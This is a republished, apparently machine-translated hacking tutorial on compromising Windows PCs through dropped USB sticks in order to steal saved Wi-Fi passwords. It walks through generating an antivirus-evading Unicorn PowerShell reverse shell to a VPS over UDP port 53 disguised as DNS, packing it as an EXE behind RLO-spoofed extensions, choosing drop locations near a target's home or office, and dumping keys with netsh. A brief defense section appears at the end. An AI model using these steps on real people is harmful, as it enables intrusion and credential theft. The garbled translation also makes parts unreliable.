قالب وردپرس درنا توس
Home / Tips and Tricks / How to Hack WPA2 Wi-Fi Passwords with Jedi Mind Tricks (and USB Dead Drops) «Zero Bytes :: WonderHowTo

How to Hack WPA2 Wi-Fi Passwords with Jedi Mind Tricks (and USB Dead Drops) «Zero Bytes :: WonderHowTo



The Newest Star Wars Movie, Solo: A Star Wars Story recorded almost $ 350 million in its first month in theaters worldwide. This is a great opportunity to discuss how hackers can use media hype (Hollywood movie hype in this case) to get an unsuspecting Windows user to put a nasty USB stick into their computer.

A long time ago, in a galaxy far, far away … a study was carried out in which 300 malicious USB sticks were dropped by researchers at a university campus in Illinois. Almost 50% of the USB sticks were recorded and at least one file was clicked on each of these USB drives.

The data showed that adding keys to the USB keyring increased the likelihood that the flash drive was inserted into a computer. The presence of keys undoubtedly reinforced the belief that the keys and the USB key were lost and not put on the ground by a hacker. The data also suggest that USB sticks labeled "Pictures" or "Winter Break Pictures" are more likely to be inserted by the victim. The addition of keys and labels should be taken into account for USB drops.

The experiment of the researchers was aimed at students and professors. They took advantage of their credulity to believe that a student could lose his USB stick on the school grounds. But what if the destination wireless router is not located at a university?

This type of attack does not have to use the Star Wars franchise as its theme, I'm just a big one of the movies. During a reconnaissance phase, it can be discovered that a target user is obsessed with zombie movies and TV series. In this case, loading the USB flash drive with content inspired by The Walking Dead or something by a celebrated horror movie filmmaker would make more sense. The point is to label the USB flash drive and fill it with content that the intended victim will find hard to ignore. Make it tempting and exciting.

This attack was installed against a Windows 1

0 Enterprise computer with Avast Antivirus

Picture by Sergey Jarochkin / 123RF [19659009] Step 1: Purchase the USB sticks

At least one USB flash drive is required for this attack. At the time of this writing, USB sticks can be purchased in bulk through sites such as Amazon, Best Buy, and Newegg. I found that it is usually possible to find 10 USB flash drives for about $ 20. Keep in mind that these prices and offers will change over time.

You could use larger storage capacities like 16 GB to really sell the idea that a movie is there, but chances are the user won. you notice the size, unless it is written directly on the stick, so works a smaller, cheaper good.

On Amazon: 10-Pack ALMEMO 128MB USB 2.0 Sticks, Swivel, Black, for $ 21 + Free Prime Shipping

Adding keys attached to the USB key ring is likely to increase the likelihood in that the USB stick is recorded and used. A local hardware store could be a good place to look for stocks and cheap keys. However, key collection is optional. You could use keys from a portable lock or house keys that come with new door knobs – any style can work if you want to attach keys.

Step 2: Set up the VPS and install metasploit

A virtual private server (VPS) is required to host the metasploit listener. This allows attackers to execute commands and issue Wi-Fi passwords on the compromised Windows computers. Install the latest version of Metasploit on a VPS with at least 1 GB of RAM.

Step 3: Clone the Unicorn Repository

Use Unicorn in a local Kali computer (not on the VPS) to create an unrecognizable payload object. Unicorn is an excellent tool for generating complex payloads that can bypass antivirus software. Readers who may have missed our article on creating an unrecognizable payload for Windows 10 should review it, as many of the techniques shown there have been customized in this demo.

After unicorn cloning, go to the unicorn / directory and generate the following command

  python unicorn.py windows / shell / reverse_udp 1.2.3.4 53 

This payload creates a reverse UDP connection (19659019) reverse_udp ) to the IP address of the attacker for the VPS ( 1.2.3.4 ) on port number 53 . The use of UDP on port 53 is in an effort to further disguise the payload and its network activity. Anyone who could examine the Internet traffic sending to and from the compromised Windows computer could confuse the packets for normal DNS activity. It will not make it impossible to discover the nefarious packages, but it can help you avoid Deep Packet Inspection (DPI).

Step 4: Rescue the payload

Then use [1969090] the newly created powershell_attack.txt file in the unicorn / directory. Select the entire PowerShell command and save it to a Windows 10 computer with the filename payload.bat .

Step 6: Convert Images to Icons

After you have decided which images and Icons should be used, these should be converted with ConvertICO. Simply upload the images you want to the website and you will reproduce them in ICO format. Save the new ICOs on the Windows 10-based computer.

Pictures by Unsplash and Looper / YouTube

Step 7: Set Up & Install B2E on Windows 10 [19659010] Then, download and then install B2E, a Windows tool for converting files to executables. This has already been dealt with several times, so I'll continue.

Step 8: Converting the PowerShell Payload to an Executable

When B2E finishes installing, import payload.bat and select the desired ICO. Click the "Convert" button to create the EXE and save the file.

This Payload.bat can be used over and over again to create multiple fake files. Just change the ICO files (converted in the previous step) and export with different filenames. Each file appears to be a different image (or file), but executes the same payload and creates multiple connections to the target Windows computer.

Step 9: Spoof the File Extensions

When all EXEs have been created, rename the files and inject the RLO Unicode character to fake the extensions.

The SCR file extension can be replaced by the EXE extension without affecting the payload. This is one of several possible file extensions that allow hackers to skillfully execute EXEs. The payload will continue to run normally and the SCR extension ("RCS" if inverted by RLO) is much less obvious than the "EXE" in the file name.

As shown in the above GIF, all files should have their filenames and extensions as fake files on the USB drive. If more than one USB flash drive is used in the attack, the payloads with fake file extensions should be copied to each discarded USB drive.

Step 10: Start Metasploit

Ready to go with the Payloads It's now safe to start Metasploit on the VPS. In the Unicorn / directory, there is a unicorn.rc resource file that is used to automate msfconsole initialization. The resource file should be copied to the VPS. Msfconsole can be started with the following command: msfconsole -r /path/to/unicorn/unicorn.rc.

  Screen msfconsole -r /path/to/unicorn/unicorn.rc

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN $ VMMMM
MMMN1 MMMMM MMMMM JMMMM
MMMN1 MMMMMMMN NMMMMMMMMMMM
MMMN1 MMMMMMMMMNmmmNMMMMMMMMMMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM
MMMNI MMMMM MMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMM MMMM # JMMMM
MMMMR? MMNM MMMMM .DMMMM
MMMMNm `? MMM MMMM`DMMMMM
MMMMMMN? MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMM, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm + .. + MMNMMNMNMMNMMNMM
https://metasploit.com

= [ metasploit v4.16.60-dev                         ]
+ - - = [ 1771 exploits - 1010 auxiliary - 307 post       ]
+ - - = [ 537 payloads - 41 encoders - 10 nops            ]
+ - - = [ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*]   Processing /opt/unicorn/unicorn.rc for ERB policy.
Resource (/opt/unicorn/unicorn.rc)> Use Multi / Handler
Resource (/opt/unicorn/unicorn.rc)> Payload windows / shell / reverse_udp
Payload => Windows / Shell / Reverse_udp
Resource (/opt/unicorn/unicorn.rc)> set LHOST 1.2.3.4
LHOST => 1.2.3.4
Resource (/opt/unicorn/unicorn.rc)> Set LPORT 53
LPORT => 53
Resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> Set EnableStageEncoding to true
EnableStageEncoding => true
Resource (/opt/unicorn/unicorn.rc)> Exploit -j
[*] Exploit is running as a background job 0.

[*] Reverse Handler started on 1.2.3.4:53
msf exploit (multi / handler)> 

For those unfamiliar with it, "Screen" is a program that allows users to manage multiple terminal sessions within the same console. It has the ability to "disconnect" or close the terminal window without losing data running in the terminal. Before executing the command, attackers can terminate their SSH session to the VPS without closing the msfconsole listener.

Step 11: Labeling and Storing USB Sticks

Where and how to put down the USB stick (s) varies depending on the scenario. If only one person is targeted, it would make sense to place the USB stick near or around her desk, her office, her driveway, her front porch or her apartment door

For a mass attack A group of people has access to the Wi-Fi target network. It would be better to place the USB flash drives in common areas, in parking lots and in common areas to provide as many people as possible with USB sticks. [19659014] Step 12: Dumping the Wi-Fi Passwords (Post-Exploitation)

When files are opened on a USB drive, a new connection is established to the VPS. In the msfconsole terminal, use the Sessions command to display compromised Windows machines.

  msf exploit (multi / handler)> sessions

Active sessions
==================

ID Name Type Information Connection
- ---- ---- ----------- ----------
1 Shell x86 / Windows Microsoft Windows [Version 10.0.16299.431] (c) 2017 Microsoft Corporation. Al ... 1.2.3.4:53 -> xxxx: 53480 (xxxx) 

Interact with the session "id" using the -i argument ( session -i 1 ).

  Session -i 1

msf exploit (multi / handler)> sessions -i 1
[*] Begin interaction with 1 ...

Microsoft Windows [Version 10.0.16299.431]
(c) 2017 Microsoft Corporation. All rights reserved.

C:  Users  IEUser> 

At this point, the attacker is put into a Windows console with little permissions (cmd). Use the following command netsh wlan show profiles to display Wi-Fi networks that the Windows computer was connected to in the past.

  C:  Users  IEUser> netsh wlan show profiles

Profiles on the interface Wi-Fi:

Group Policy Profiles (read-only)
---------------------------------


user profile
-------------
All user profiles: 446CF4
All user profile: Tatooine
All user profiles: 3PVXQ
All user profile: Stewie
All user profiles: FiOS-6DH1H
All user profiles: attwifi
All users profile: Death Star
All users profile: Belkin.4412
All users profile: Garden Guest
All users profile: Jedi Temple
All user profiles: cradle233
All users profile: Lando Calrissian
All user profile: TransitWirelessWiFi
All user profile: StudioWifi
All user profile: ACE lobby
All user profile: Lark Cafe
All user profiles: D9F9AD 

To display the password for a specific Wi-Fi network, use the arguments and . The password ("Attack of The Clones") can be found in the "Key Content" line.

  C:  Users  IEUser> netsh wlan show profile_name = "tatooine" key = clear

Profile Tatooine on interface Wi-Fi:
============================================= =====================

Applied: All user profiles

Profile information
-------------------
Version 1
Type: WLAN
Name: Tatooine
Control options:
Connection mode: Connect automatically
Network Transfer: Only connect when this network is transmitting
AutoSwitch: Do not switch to other networks
MAC Randomization: Disabled

connection settings
---------------------
Number of SSIDs: 1
SSID name: "Tatooine"
Network Type: Infrastructure
Radio Type: [ Any Radio Type ]
Vendor extension: Not available

security settings
-----------------
Authentication: WPA2-Personal
Cipher: CCMP
Authentication: WPA2-Personal
Cipher: GCMP
Security key: Present
Key Content: Attack of the Clones

cost settings
-------------
Costs: Unrestricted
Clogged: no
Approach to data limit: no
About data limit: no
Roaming: No.
Cost Source: Standard 

How to Protect Against USB Drop Attacks

If you discover a rogue USB drive, you should leave it alone. If the USB key is keyed and you want to return it, it's okay to be a good Samaritan – but do not try to figure out what's on the USB storage device. For the refurbishment, the researchers recommend the following:

If you can not prevent connecting any USB device, you should at least:

  • View details] Use the Detailed layout view in Windows File Manager. This displays information about the file type and lets you detect strange or suspicious file types.
  • Always-displayed file extensions. Make sure that file type extensions are not "hidden".

Do not Miss: How to Hack One's Wi-Fi Password with a Birthday Card

Cover Picture by Daniel Cheung / Unsplash; Screenshots of tokyoneon / zero byte

Source link